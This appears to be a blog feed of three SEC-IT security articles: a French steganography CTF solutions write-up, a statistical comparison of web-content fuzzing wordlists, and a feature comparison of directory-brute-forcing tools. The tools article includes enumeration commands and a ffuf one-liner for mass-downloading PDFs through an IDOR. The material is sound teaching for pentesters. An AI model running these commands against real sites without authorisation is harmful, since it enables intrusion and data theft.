La stéganographie est le procédé de dissimulation d'un message confidentiel au sein de données. Dans le cadre d'un cours enseigné à l'ESNA, SEC-IT a proposé une série d'exercices et challenges stéganographiques dont voici les corrigés.
Nom | Points |
---|---|
50 | |
Music please | 50 |
Music please - Flag 2 | 50 |
Stats - MSE | 50 |
Stats - PSNR | 50 |
Purple | 75 |
LSB Factory | 100 |
Linked List LSB | 300 |
La difficulté des challenges est proportionnelle au nombre de points attribués.
PDF
est un challenge proposant un fichier PDF. Ce dernier est une copie du PDF de présentation de L'ESNA, et possède un total de 2 pages.
En stéganographie, les fichiers PDF sont réputés leurs différentes interprétations selon les lecteurs, mais également pour la superposition des objets PDF rendant parfois invisibles certains objets comme des blocs de texte ou des images.Ces mêmes objets PDF peuvent être parfois renseignés dans la table de référence du fichier mais non affichés sur le document.
Pour ce challenge, il s'agissait d'un simple texte noir sur fond noir :
Peu de lecteurs PDF permettent la sélection d'un texte caché comme celui-ci, le lecteur proposé par Google Chrome propose toutefois de sélectionner l'ensemble du texte (CTRL+A).Il suffit ensuite de copier puis coller le contenu dans un fichier texte.
Nous nous retrouvons donc avec la chaine de caractère 92149279564403446967073413054727415165
.Il s'agit d'un entier codé sur la base 10.Afin de convertir cet entier en chaine de caractère, il est possible de le convertir en binaire ou hexadecimal puis en texte, ou bien d'utiliser la commande python3 suivante :
1 | import binascii |
Une autre solution en ruby:
1 | require 'ctf_party' # gem install ctf-party |
Flag : ESNA{spAAAAAAce}
Pour ce challenge un fichier challenge.wav
était fourni.Le fichier wav dure 31 secondes et propose le début de la musique IMANU - Memento.Les oreilles les plus affinées reconnaîtront un léger grésillement présent uniquement sur les 4 premières secondes du fichier.Ce grésillement plutôt aigu devrait être visible dans les hautes fréquences du spectre audio du fichier wav.Pour l'observer, il suffit d'ouvrir le fichier à l'aide de l'outil audacity.
Une fois le spectre affiché, celui-ci se trouver généralement sur une échelle limitée ne dépassant pas 8000 Hz.Pour afficher le spectre complet (et donc les hautes fréquences), effectuer un clic droit sur l'échelle de fréquence puis Zoom to Fit
(ou Zoom Adapté
sur la version française).
Le spectre est maintenant entièrement affiché.
On observe un signal transmis dans les fréquences aiguës à l'aide de signaux courts et longs.Il s'agit enfait du code Morse international, permettant de transmettre du texte à l'aide de séries d'impulsions courtes et longues.Ce même code a permis au prisonnier de guerre Jeremiah Denton de transmettre le mot torture lors d'une interview télévisée à l'aide d'une série de clignements des yeux.Ce message caché a notamment permis de passer outre la censure vietnamienne afin de confirmer pour la première fois l'utilisation de la torture sur les prisonniers américains.
1 | . ... -. .- |
Une fois décodé, le code morse devient :
1 | ESNA HIDDEN MORSE CODE |
FLAG : ESNA{HIDDEN MORSE CODE}
Toujours sur le même fichier challenge.wav
se trouvait un deuxième message caché.La musique contenue dans le fichier semble être coupée juste avant le drop de la composition originale (comme l'indique sa durée totale de 31 secondes lors de son ouverture dans un lecteur classique).La taille du fichier semble par ailleurs anormalement haute (un peu plus de 90 Megaoctets), ce qui correspond généralement à un fichier avec une forte qualité sur plusieurs minutes.Le fichier aurait donc pu être correctement altéré afin d'en limiter sa lecture.
Afin de réparer le fichier wav, il faut d'abord se renseigner sur son format de fichier :
1 | [Bloc de déclaration d'un fichier au format WAVE] |
Parmi l'ensemble des blocs décrivant le fichier, le bloc DataSize
retient notre attention.En effet, celui-ci permet de spécifier le nombre de blocs de données audio du fichier.Si celui-ci a été volontairement décrémenté, alors une partie du fichier ne sera pas lue par les lecteurs.Le bloc DataSize
est facilement identifiable puisqu'il s'agit des 4 octets suivants la constante data
.
Nous pouvons dès à présent éditer notre fichier wav dans un éditeur hexadécimal comme hexedit ou encore l'éditeur hexadécimal en ligne HexEd.it.
Le contenu du bloc DataSize
est donc de 28 2D B6 00
.On remarque que la taille est codée dans l'orientation petit-boutiste (little endian), avec les octets de poids fort vers la fin.Nous avons donc 0x00B62D28
blocs (11939112).Nous allons incrémenter cette valeur à 0xFFB62D28
blocs (4290129192), soit la valeur 28 2D B6 FF
.
Il suffit ensuite de sauvegarder le fichier et l'ouvrir de nouveau.On observe maintenant que le fichier a une durée de 3:57.
La fin de la musique se termine par une voix avec le message suivant :
1 | Bravo, the flag is in uppercase : ESNA{IMANU_MEMENTO}. |
Flag : ESNA{IMANU_MEMENTO}
Pour ce challenge, un fichier cover_image.png
et stego_image.png
étaient fournis, avec l'énoncé suivant :
1 | Calculer la valeur MSE pour le couple d'image suivant, tronqué 10 chiffres après la virgule. |
En ayant suivi le cours, ou en recherchant rapidement sur un moteur de recherche, on tombe sur la page Wikipédia de l'Erreur quadratique moyenne ("Mean Squared Error" en anglais).Cette mesure est généralement associée au PSNR, abordé dans le challenge suivant.
L'erreur quadratique moyenne est un estimateur statistique qui, dans le traitement d'images, permet de calculer la différence moyenne des pixels entre deux images.Elle est définie par la formule suivante :
Pour calculer cette valeur, nous utilisons python et la bibliothèque Pillow.
1 | #!/usr/bin/env python3 |
Nous avons en sortie : MSE: 0.49977941176470586
.
Flag : ESNA{0.4997794117}
L'énoncé de ce challenge reprenait les deux mêmes images que le challenge précédent en demandant cette fois-ci la valeur PSNR des deux images.Le PSNR (Peak signal-to-noise ratio), est une mesure de la distorsion qui se calcule directement à partir de l'erreur moyenne quadratique (c.à.d. la valeur MSE calculée dans le précédent challenge).Le PSNR est défini de la façon suivante :
Pour résoudre le challenge, il suffit de reprendre notre script et ajouter le calcul de la formule.On notera l'import de la fonction log10 de la bibliothèque native math
:
1 | #!/usr/bin/env python3 |
Nous avons en sortie : PSNR: 51.14301999315866
.
Flag : ESNA{51.1430199931}
Le challenge propose un fichier challenge.bmp
. La commande exiftool
nous donne plus d'indication sur le format de fichier :
1 | $ exiftool challenge.bmp |
Nous avons donc une image bitmap avec les masques suivants :
En cherchant ces adresses sur internet, on se rend compte que l'image est sauvegardée avec le mode RGB565 (aussi appelé R5G6B5).Ces chiffres correspondent au nombre de bits alloués par canal (soit un total de 16 bits).Une recherche R5G6B5 BMP steganography
sur internet nous mène à l'article "BMP PCM polyglot".
Note : le site était également identifiable avec la recherche "BMP 16 bits polyglot".
L'article nous explique alors qu'il est possible de créer un fichier qui soit à la fois une image BMP valide mais également un son au format raw (PCM).Pour cela, les deux fichiers sources doivent être encodés sur 16 bits (le fichier wav ainsi que le fichier bitmap) afin de générer un BMP codé sur 32 bits.L'article explique que le regroupement des fichiers vient étendre le spectre audio et placer le contenu des pixels dans le spectre inaudible.La définition du masque R5G6B5 permet alors d'indiquer la position des données d'images dans le fichier.
Afin de lire l'image, l'article suggère l'utilisation d'aplay ou audacity.Pour ce dernier, il suffit lancer l'outil et cliquer sur Fichier
> Importer
> Données brutes (Raw)...
et sélectionner l'image.Précisez ensuite un encodage Signed 32 bits PCM
, un ordre Petit boutiste
, les canaux en Stereo
avec un échantillonnage à 44100 Hz :
Une fois notre fichier chargé dans audacity, il est possible d'entendre une voix humaine accélérée.Pour la ralentir, sélectionnen l'audio (CTRL+A) puiss cliquez sur Effets
> "Ralentir" et appliquez un ratio de 0,250.
En cliquant sur le bouton play, on entend le message suivant :
1 | GG well play, the flag is in uppercase : |
Flag : ESNA{LITTLEPOLY}
Ce challenge propose un site web avec un formulaire d'upload et un timer de quelques secondes. Le site web en question nous demande d'encoder un message défini sur une image à l'aide de la technique LSB :
La technique du LSB ayant été abordé pendant le cours précédant le TP, nous invitons le lecteur à se renseigner sur cette méthode pour comprendre la suite de la correction.Afin de résoudre ce challenge, nous allons développer un script python en utilisant la bibliothèque requests pour les requêtes web et pillow pour la gestion de l'image.Un début de script était également fourni en indice, où seule la manipulation des LSB était nécessaire (seules les lignes 33 à 50 étaient manquantes).Voici le script final :
1 | #!/usr/bin/env python3 |
De manière plus détaillée :
Une fois lancé, le script nous renvoie le flag :
1 | Taille de l'image : 400x400 |
Flag : ESNA{I_made_4n_anoying_LSB_Steg0_ch4ll}
Ce challenge était le plus difficile de l'ensemble du TP. Pour le résoudre, un papier scientifique est fourni ainsi qu'une image au format PNG.L'article scientifique propose un modèle stéganographique reposant sur la méthode LSB ainsi que sur une répartition des pixels suivant un principe de liste chainée.
Dans cette méthode, un maillon (ou bloc), est représenté par une suite de pixels successifs.La donnée stockée par le bloc (valeur secrète) est codée sur les LSB des 3 premiers pixels.L'adresse du prochain maillon (et donc, le numéro du prochain pixel), est quant à lui stocké sur les LSB restants du bloc.
Avec cette technique, la taille d'un bloc dépend de la taille nécessaire pour stocker l'adresse du prochain bloc, et dépend donc indirectement de la taille de l'image.Plus l'image est grande, plus elle a de pixels, plus l'adresse d'un pixel nécessite de bits pour être stockée et plus la taille d'un bloc sera grande.
D'une manière plus précise, la taille nécessaire pour stocker une adresse est définie de la façon suivante :
La première étape consistait donc à calculer la taille d'une adresse et d'un bloc pour l'image donnée.
Notre image possède une taille de 3840x2160 soit un total de 8294400 pixels. Il faut donc 2^23 bits pour stocker autant d'adresses (ici, k = 23
).En répartissant ce total de 23 bits sur les couches de LSB, on obtient 7 pixels complets ainsi que 2 canaux, soit 8 pixels au total.La taille d'une adresse est donc de 8 pixels. La taille du bloc est donc de 3 pixels de données + 8 pixels d'adressage soit un total de 11 pixels par bloc.
Une fois la taille d'un bloc calculé, il faut coder une fonction d'extraction pour récupérer à la fois la valeur du secret caché dans le maillon mais également l'adresse du prochain maillon.Pour notre script, cette fonction prend donc en entrée l'adresse d'un maillon de la liste de pixels data
, ajoute le secret du bloc à la variable secret_msg
et retourne l'adresse du prochain bloc :
1 | def get_data(addr): |
L'énoncé du challenge nous indiquant l'adresse du premier bloc (Starting pixel : 6075891), une vérification manuelle des résultats de la fonction sur ce premier bloc permet de vérifier le bon fonctionnement de la fonction.On récupère bien la lettre E
et l'adresse du maillon suivant: 2732600
.
Le script d'extraction final est le résultat de la fonction get_data
et d'une boucle, le tout précédé par le calcul automatique de la taille du maillon:
1 | #!/usr/bin/env python3 |
L'exécution du script nous renvoie le flag :
Flag: ESNA{L1nk3d_List_LSB_technique} - https://www.sec-it.fr/ - [end]
Cet article a été écrit par Alex GARRIDO a.k.a. zeecka.Alex est pentester chez SEC-IT.
Website: zeecka.fr
]]>Perimeter discovery is an important step during a web pentest and can, in some cases, lead to a website compromise. In order to carry out this recognition, several tools are available, including web content wordlists for web fuzzing:
Name | First release | Last Update | Max Size (lines) |
---|---|---|---|
SecLists | 2012/02/20 | 2021/02/12 | 1.273.833 (directory-list-2.3-big.txt) |
Assetnote wordlists | 2020/11/16 | 2021/01/28 | 4.319.406 (httparchive_js_2020_11_18.txt) |
Dirb wordlists | 2015/06/16 | 2015/06/16 | 20.469 (big.txt) |
DirBuster wordlists | 2013/05/01 | 2013/05/01 | 220.560 (directory-list-2.3-medium.txt) |
Dirsearch dicc.txt | 2013/05/22 | 2021/02/10 | 9.021 (dicc.txt) |
Wfuzz wordlists | 2014/10/23 | 2019/03/14 | 45.459 (megabeast.txt) |
Wordlistctl (Bonus) | 2018/10/28 | 2018/11/02 | N/A |
* this post has been written in Feb. 2021
Note that this post only includes routes, files and folder wordlists. Therefore, wordlists which include passwords such as rockyou.txt
will not be covered.
SecLists is a collection of multiple types of wordlists, including usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
SecLists is the security tester's companion. [...] The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.
The repository is actively maintained and its last commit is less than two weeks ago. The package is provided by most of pentesting Linux releases such as Black Arch and Kali Linux.
Covered wordlists are located into Discovery/Web-Content/
. We can notice that there is a lot of available wordlists (121 in the main folder). Some of them are specific for a given technology (CGIs.txt
, coldfusion.txt
, oracle.txt
...), others are specific for a given language (common-and-french.txt
, common-and-dutch.txt
...). The main wordlist family present in SecList is the "RAFT Word Lists".
RAFT wordlists has been generated from robots.txt
from 1.7 million websites and were originally provided by RAFT Tool in 2011. In this family, wordlists are separated as follows :
Name | Size (lines) large | Size (lines) medium | Size (lines) small |
---|---|---|---|
raft-*-directories.txt | 62.283 | 30.000 | 20.116 |
raft-*-directories-lowercase.txt | 56.163 | 26.584 | 17.770 |
raft-*-files.txt | 37.042 | 17.128 | 11.424 |
raft-*-files-lowercase.txt | 35.324 | 16.243 | 10.848 |
raft-*-extensions.txt | 2.449 | 1.289 | 963 |
raft-*-extensions-lowercase.txt | 2.366 | 1.233 | 914 |
raft-*-words.txt | 119.600 | 63.087 | 43.003 |
raft-*-words-lowercase.txt | 107.982 | 56.293 | 38.267 |
Looking at raft-*-files.txt, we got the following extension repartition :
Histogram | Pie chart |
---|---|
SecLists also includes wordlists provided with dirbuster and dirb, covered in the rest of this post.
Assetnote is a company that provides security tools and services to measure exposure to external attack. The company also provides a repository named Assetnote Wordlist.
Theses wordlists are generated monthly using Google BigQuery datasets with their GO client named commonspeak2, and results in content discovery and subdomain wordlists.
As these datasets are updated on a regular basis, the wordlists generated via Commonspeak2 reflect the current technologies used on the web.
Wordlists are generated per technologies, for this post we will focus on directories, API routes and PHP, ASP.NET, JSP/JSPA languages.
Note : As January 2021 wordlists seems less complete than previous wordlists, and February 2021 wordlists not available at this time, we will focus in November 2020 wordlists.
Name | Technologie | Size (lines) |
---|---|---|
httparchive_directories_1m_2020_11_18.txt | Directories | 1.000.000 |
httparchive_apiroutes_2020_11_20.txt | API routes | 953.011 |
httparchive_php_2020_11_18.txt | PHP | 74.887 |
httparchive_aspx_asp_cfm_svc_ashx_asmx_2020_11_18.txt | ASP .NET | 63.200 |
httparchive_jsp_jspa_do_action_2020_11_18.txt | JSP | 10.506 |
Assetnote Directories | Assetnote API routes |
---|---|
Note: /
, -
and _
are considered as a wildcard in the previous graph.
Dirb is a web discovery tool already covered in a previous post. The tool is provided with multiple wordlists including more common ones:
Name | Size (lines) |
---|---|
common.txt (default wordlist for dirb) | 4.614 |
big.txt | 20.469 |
small.txt | 959 |
Charsets in dirb family. | |
---|---|
Those wordlist doesn't have any extensions and only 2% of the words contain capital letters. You can also note that there is more "other" charsets in common.txt
than in big.txt
.
DirBuster is a web discovery tool that has also been covered in a previous post. The tool is provided with multiple wordlists including directory-list-2.3
wordlists family.
Name | Size (lines) |
---|---|
directory-list-2.3-big.txt | 1.273.833 |
directory-list-2.3-medium.txt | 220.560 |
directory-list-2.3-small.txt | 87.664 |
Some packaged versions may not include directory-list-2.3-big.txt.
Such as dirb wordlists, directory-list-2.3 doesn't include any extensions.
Charsets in directory-list-2.3 family. | |
---|---|
Note: /
, -
and _
are considered as a wildcard in the previous graph.
dicc.txt is a wordlist provided with dirsearch tool. The wordlist has the particularity to provide the variable extension %EXT%
. Therefore, the wordlist must be used with tools that support %EXT%
format (see post about web discovery tools).The wordlist has a total of 9021 lines distributed as follows :
dicc.txt | |
---|---|
You can note that there is "only" 500 words containing %EXT%
extension.
Wfuzz tool is provided with a lot of wordlists. Some of them in "general" directory are dedicated for directories and files enumeration. That's the case of megabeast.txt
, big.txt
, medium.txt
and common.txt
. None of those wordlist have words containing extensions. They are distributed as follows :
Charsets in wfuzz family. | |
---|---|
In some case, an auditor may look for a specific wordlist. Wordlistctl is a tool design to fetch, install, update and search for a given wordlists. This python script offers more than 6400 wordlists and is maintained by BlackArch Linux distribution.
1 | $ wordlistctl search wordpress |
I (Alexandre ZANNI a.k.a. noraj) am adding a little bonus section aboutsecurity.txt in web wordlistson Alex GARRIDO (a.k.a. zeecka) article.
In 2020, I wrote an article about security.txt
on TurgenSec blog:Security.txt | Progress in Ethical Security Research.
I invite you to read the article to understand what is security.txt, what it isused for, and how widely adopted it has become.
Here we are only going to get an idea of how widely security.txt isincluded in security wordlist.
There are only 3 lists used for Web content discovery in SecLists that are actually includingat least one variant of the security.txt file among the 233.
1 | $ grep -rnE '^security.txt|.well-known/security.txt' /usr/share/seclists/Discovery/Web-Content |
We can conclude that only 1,3% of Web content discovery in SecLists are includingsecurity.txt.
But SVNDigger/all.txt
is only including security.txt
while common.txt
anddirsearch.txt
are only including .well-known/security.txt
. So zero listis including the 2 variants.
The Assetnote Wordlists are cut under 3 categories:
We'll exclude technologies from the stats since it's focusing on specificproducts.
There are only 3 lists used for Web content discovery in Assetnote Wordliststhat are actually includingat least one variant of the security.txt file among the 77 generic wordlists.
1 | $ grep -rnE '^security.txt|.well-known/security.txt' /tmp/assetnote-wordlists/{automated,manual} |
We can conclude that only 3,8% of Web content discovery in Assetnote Wordlistsare including security.txt.
But all the three are only including security.txt
and do not include thestandard path .well-known/security.txt
.
If you are trying to find security.txt files, you should build your customwordlists including the two following entries as most of the generic wordlistsdon't include them.
1 | security.txt |
An alternative would be to run the common wordlists you are used to fuzz withand build only an additional wordlist including only files like security.txtor other files that may be missing from most wordlists so you don't have toupdate the generic part on your own.
Without further ado, here is a comparative table of the different wordlists discussed in this post. Colored cases represent a high correlation between wordlists. To understand the matrix you should read: "N% of the wordlist at line Y is contained in wordlist at column X"
.
I.E.: 87% of wordlist n°17 (dirb - small) is contained in wordlist n°0 (seclists - raft-large-files).
The sources used to generate this chart are available on this repository:sec-it/WL-Comparison.
An interactive version of the chart is available online.
This piece was written by Alex GARRIDO a.k.a. zeecka.Alex is a pentester at SEC-IT.
Website: zeecka.fr
]]>Perimeter discovery is an important step during a web pentest and can, in some cases, lead to a website compromise. In order to carry out this recognition, several tools are available, including web content enumeration tools:
Name | Version* | First release | Last Release | Language |
---|---|---|---|---|
Dirb | 2.22 | 2005/04/27 | 2014/11/19 | C |
DirBuster | 1.0-RC1 | 2007 | 2013/05/01 | Java |
Dirsearch | 0.4.1 | 2014/07/07 | 2020/12/08 | Python3 |
FFUF | 1.2.1 | 2018/11/08 | 2021/01/24 | Go |
Gobuster | 3.1.0 | 2015/07/21 | 2020/10/19 | Go |
Wfuzz | 3.1.0 | 2014/10/23 | 2020/11/06 | Python3 |
BFAC (Bonus) | 1.0 | 2017/11/08 | 2017/11/08 | Python3 |
* this post has been written in Feb. 2021
Other tools such as Rustbuster, FinalRecon or Monsoon exists and won't be fully described since they're less known and used. They'll be part of the synthesis.
Dirb is a web content scanner written in C and provided by The Dark Raver since 2005.
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
The last release of this tool was 5 years ago, in 2014, with the version 2.22. The package is provided by most of pentesting Linux releases such as Black Arch and Kali Linux.
The tool is provided with many wordlists, including big.txt, and common.txt (its default wordlist). Dirb is also provided with two utilities: html2dic
which is an equivalent of cewl and gendict
which is an equivalent of crunch, both are used for wordlist generation.
Despite dirb is one of the oldest web discovery tools, it proposes most of the advanced options such as custom headers, custom extensions, authenticated proxy and even interactive recursion. Unfortunately, the tool is one of the rarest that doesn't provide multithreaded capabilities.
-R
option for interactive mode)DirBuster is a web content scanner written in Java provided the OWASP Foundation since 2007. The project is no longer maintained by OWASP and the provided features are now part of the OWASP ZAP Proxy. The last release of the tools was version 1.0-RC1 in 2008. DirBuster has the particularity to provide a GUI :
Even if the project is not proposed by OWASP anymore, source of the tool can be found on SourceForge. The tool is also provided by most of pentesting Linux distributions.
The tool is packaged with 8 wordlists including directory-list-1.0.txt
and apache-user-enum-2.0.txt
.
src
and href
attributes)Dirsearch is a command-line tool designed to brute force directories and files in web servers. The tool is written in Python3 since 2015 but was designed in 2014 with Python2. Dirsearch is still maintained and the last release was in December 2020.
As a feature-rich tool, dirsearch gives users the opportunity to perform a complex web content discovering, with many vectors for the wordlist, high accuracy, impressive performance, advanced connection/request settings, modern brute-force techniques and nice output.
As you can see, dirsearch provides many options to perform wordlist transformation such as extension exclusion, suffix, extension removal. Dirsearch even provide 429 - Too Many Requests
error handling, raw requests handling, and regex checks. Dirsearch is provided with a default wordlist named dicc.txt which contain %EXT%
tags which will be replaced with user-defined extensions.
Finally, dirsearch provide multiple report formats including text, JSON, XML, Markdown and CSV.
--raw
option, and any HTTP method with -m
.FFUF (Fuzz Faster U Fool) is a web fuzzer written in Go. The tool is quite recent (first release in 2018) and is actively updated. Unlike the previous tools, FFUF aims to be an HTTP fuzzing tool which can be used not only for content discovery but also for parameters fuzzing. Thanks to its design, FFUF also has the ability to fuzz headers such as VHOST.
Such as Dirsearch, FFUF provide filter and "matcher" options (including regex) to sort results, and a lot of output formats (including JSON and XML). FFUF is the only one to provide multi-wordlist operation mode, such as attack type in BurpSuite intruder. This mode can be used for bruteforce attack or complex fuzzing discovery.
Finally, we can note that the option -D
allow us to reuse specific Dirsearch wordlists sur as dicc.txt
.
As indicated by his name, Gobuster is a tool written in Go. The first release of gobuster was in 2015 and the last one in October 2020. Gobuster is a powerful tool with multiple purpose :
Gobuster is a tool used to brute-force:URIs (directories and files) in websites.DNS subdomains (with wildcard support).Virtual Host names on target web servers.Open Amazon S3 buckets
As mentioned in the project description, Gobuster has been originally created to avoid Dirbuster Java GUI and that do support content discovery with multiple extensions at once.
As said in the tools description, Gobuster aim to be a simple tool without any fancy options. Note that Gobuster is provided without any wordlist.
-d
option to discover backup filesWfuzz is a web fuzzer written in Python3 and provided by Xavi Mendez since 2014.
Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.
The tool is still maintained with a recent release in November 2020. The package is provided by most of pentesting Linux releases.
The tool is provided with a lot of wordlists: General (big.txt
, common.txt
, medium.txt
...), Webservices (ws-dirs.txt
and ws-files.txt
), Injections (SQL.txt
, XSS.txt
, Traversal.txt
...), Stress (alphanum_case.txt
, char.txt
...), Vulns (cgis.txt
, coldfusion.txt
, iis.txt
...) and others.
Such as Fuff, Wfuzz replace the FUZZ
keyword by a payload from a given wordlist. Wfuzz provides multiple filters including regex filters (--ss/hs
) and supports multiple outputs (JSON, CSV, ...). Also, Wfuzz is one of the rarest tools to support both basic auth, NTLM auth and digest auth.
BFAC (Backup File Artifacts Checker) is not a tool design to search for new folders, files or routes, but a tool designed to search for backup files.
BFAC (Backup File Artifacts Checker) is an automated tool that checks for backup artifacts that may disclose the web application's source code. The artifacts can also lead to leakage of sensitive information, such as passwords, directory structure, etc.The goal of BFAC is to be an all-in-one tool for backup-file artifacts black box testing.
Given a list of files URI, BFAC will attempt to recover associated backup files with a hardcoded list of tests. For example, for the file /index.php
, BFAC will not only attempt to recover /index.php.swp
and /index.php.tmp
, but also includes tests such as /Copy_(2)_of_index.php
, /index.bak1
or /index.csproj
.
As you can imagine, BFAC should be used as a complement of previous tools. It supports most of the expected features such as proxy support, custom headers and different outputs.
The main use of these tools is file discovery on a common web server, such as a PHP website running on an apache2. Searching for files on this kind of web server often leads to HTTP errors such as 404 - File not found
, 403 - Forbidden
or HTTP success such as 200 - OK
. Other HTTP status codes may be encountered, like 302 - Found
, 429 - Too Many Requests
, 500 - Internal Server Error
...
Depending on the server configuration, an auditor may or may not include specific HTTP status code during file discovery. The default configuration on most of the tools is to hide 404 - File not found
from results. Displayed status codes may vary between tools but 200 - OK
is the most common displayed result.
i.e., by default, Dirsearch will print not only 200
status code but also 301
, 302
, etc.
1 | dirsearch -u http://localhost/ |
Note : By default dirsearch only replaces the
%EXT%
keyword with extensions. Using-f
flag will force dirsearch to add extensions for a given wordlist. This option is useless if your wordlist already contains file extensions.
The same task can be accomplished by the other tools :
1 | dirb http://localhost/ /usr/share/wordlists/raft-large-words.txt -X php,php5,sql |
Sometimes, server won't reply as expected for your tools and will reply a 403
error instead of a 404
error, or worst a 200
status code with a custom error page.
In this case, the auditor must configure his tool to match with the server answer. For the 403
case, the first solution is to exclude 403 results from his tool :
1 | dirb http://localhost/ /usr/share/wordlists/raft-large-words.txt -X php,php5,sql -N 403 |
With this solution the auditor may miss interesting 403
errors. The second option is to filter more precisely the content you're not looking for.
If the 403
error is a custom page or if you got a 200
status code with an error message, you may filter web pages by their content and not with their status code. Tools provide multiple way to perform that: you can either filter by page size (assuming the error page is always the same size), or you can filter per words or regex present in the web page.
i.e., if a website returns a 200
HTTP status code with an HTML page containing the sentence Page not found
, you may filter with the following :
1 | dirsearch -u http://localhost/ --exclude-texts="Page not found" -e php,php5,sql -w /usr/share/wordlists/raft-large-words.txt -f |
Not that this method is not available for every tool.
With the evolution of Web development standards, auditors encounter more and more varied web routing techniques. Therefore, it's not rare that resources are accessible through dynamic routes. That's the case of RESTfull WEB API where certain resources must be fuzzed at the middle of an URI.
Let's take the example of a REST API where the route /vps/{serviceName}/ips
is available with GET
requests (and where the route /vps/{serviceName}
doesn't exist). To enumerate this parameter, you've got 3 possibilities :
/ips
as an extension 🧐 ;ffuf
or wfuzz
to perform precise parameter fuzzing (recommended).1 | [deprecated] dirsearch -u http://localhost/vps/ --suffixes /ips -w /usr/share/wordlists/raft-large-words.txt |
Sometimes resources location is based on a more complex parameter such as Accept-Language
header, HTTP POST parameter or even IP address.
During a pentest, SEC-IT auditors encounter a vulnerability allowing users to download PDF on page /files/pdf
with POST parameter {"objectId": "X"}
where X is an integer. The vulnerability itself was an IDOR (Insecure Direct Object Reference) : a user could download any PDF without privilege restriction.The problem is that even if the vulnerable parameter was a pseudo-incremental ID, there was a random step between each ID which makes the exfiltration harder without any tool.
To perform this PDF exfiltrations, web fuzzer like ffuf and wfuzz can be used to fuzz the objectId
POST parameter :
1 | ffuf -u http://localhost/files/pdf -X POST -d '{"objectId" : "FUZZ"}' -w /usr/share/wordlists/ints.txt |
Without further ado, here is a comparative table of the different tools discussed in this post :
Dirb | Dirbuster | Dirsearch | FFUF | GoBuster | Wfuzz | Rustbuster | FinalRecon | Monsoon | BFAC | |
---|---|---|---|---|---|---|---|---|---|---|
Language | C | Java | Python3 | Go | Go | Python3 | Rust | Python3 | Go | Python3 |
First release | 27/04/2005 | 2007 | 07/07/2014 | 08/11/2018 | 21/07/2015 | 23/10/2014 | 20/05/2019 | 05/05/2019 | 12/11/2017 | 08/11/2017 |
Last release | 19/11/2014 | 01/05/2013 | 08/12/2020 | 24/01/2021 | 19/10/2020 | 06/11/2020 | 24/05/2019 | 23/11/2020 | 28/10/2020 | 08/11/2017 |
Current version | 2.22 | 1.0-RC1 | 0.4.1 | 1.2.1 | 3.1.0 | 3.1.0 | 1.1.0 | no versionning | 0.6.0 | 1.0 |
License | GPLv2 | LGPL-2 | GPLv2 | MIT | Apache License 2.0 | GPLv2 | GPLv3 | MIT | MIT | GPLv3 |
Maintained | No | No | Yes | Yes | Yes | Yes | Yes | Yes | Yes | Yes |
GUI/CLI | CLI | GUI (Java) | CLI (colorized by default) | CLI (colorize option) | CLI | CLI (colorize option) | CLI | CLI (colorized by default) | CLI (colorized by default) | CLI (colorized by default) |
Profile options file | No | No but ability to modify default threads, WL and extentions | Yes (default.conf) | Yes (-config) | No | Yes (--recipe) | No | No | Yes (-f) | No |
Output | No (-o, text only) | Yes (XML, CSV, TXT) | Yes (JSON, XML, MD, CSV, TXT) | Yes (JSON, EJSON, HTML, MD, CSV, ECSV) | No (-o, text only) | Yes (-o, JSON, CSV, HTML, Raw) | No (-o, text only) | Yes (-o, XML, CSV, TXT) | No (--logfile, text only) | Yes (JSON, CSV, TXT) |
Multithread | No | Up to 500 | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (--threads) |
Delay | Yes (-z) | Yes (Rate limit) | Yes (-s) | Yes (-p), accept range | Yes (--delay) | Yes (-s) | No | No | Yes (--requests-per-second) | Yes (Rate limit) |
Custom Timeout | No | Yes | Yes (--timeout) | Yes (-timeout) | Yes (--timeout) | Yes (--req-delay) | No | Yes (-T) | No | Yes (--timeout) |
Proxy | Yes (-p/-P, socks5) | Yes (not specified, authenticated) | Yes (--proxy, http/socks5) | Yes (-x, http, see issue 50) | Yes(--proxy, http(s) ) | Yes (-p) Socks4 / Socks5 / HTTP (unauthent) | No | No | Yes (SOCKS5/HTTP(s) authenticated) | Yes (--proxy, http(s)/socks5 authenticated) |
Auth | Basic | Basic / Digest / NTLM | Basic with Headers | Basic with Headers | Basic (-U/-P) | Basic / Digest / NTLM | Basic with Headers | No | Basic (-u) | Basic with Headers |
Default WL | common.txt (4614) | No | dicc.txt (9000) | No | No | No | No | dirb_common.txt (4614) | No | N/A |
WL provided | Yes (more than 30) | Yes (8) | Yes (5) | No | No | Yes (more than 30) | No | Yes (3) | No | N/A |
Recursion | By default, switch available | Yes | Yes (-r) | Yes (-recursion) | No | Yes (-R) | No | No | No | N/A |
Recursion depth | No but interactive mode available | No | Yes (-R) + interactive | Yes (-recursion-depth) | N/A | Yes (-R) | N/A | N/A | N/A | N/A |
Multiple URLs | No | No | Yes (-l) / CIDR | Yes (using wordlist of hosts) | No | Yes (using wordlist of hosts) | No | No | No | Yes (-L) |
Multiple WL | Yes (commas separated) | No | Yes, commas seperated | Yes (repeat -w) | No | Yes (repeat -w) | Yes (for multiple Fuzzing point) | No | No | N/A |
WL Manipulation | No | No | Yes (lots of transformations) | No | No | Yes (using encoders and script) | No | No | No | N/A |
Encoders | No | No | No | No | No | Yes | No | No | No | N/A |
Single Extension | Yes (-X/-x) | Yes | Yes (-e) | Yes (-e) | Yes (-x) | Yes | Yes (-e) | Yes (-e) | Yes | N/A |
Multiple Extensions | Yes (-X/-x) | Yes (commas separated) | Yes (-e, commas separated) | Yes (-e, commas separated) | Yes (-x, commas separated) | Yes (with given wordlist) | Yes (-e, commas separated) | Yes (-e, commas separated) | No | N/A |
Custom User-Agent | Yes (-a/-H) | Yes | Yes (--user-agent) + random | Yes (with header -H) | Yes (-a) + random | Yes (with header -H) | Yes (-a) | No | Yes (with header -H) | Yes (-ua) |
Custom Cookie | Yes (-c/-H) | Yes (through headers) | Yes (--cookie) | Yes (with header -H) | Yes (-c) | Yes (-b) | Yes (with header -H) | No | Yes (with header -H) | Yes (--cookie) |
Custom Header | Yes (-H) | Yes | Yes (-H) + Headers file | Yes (-H) | Yes (-H) | Yes (-H) | Yes (-H) | No | Yes (-H) | Yes (--headers) |
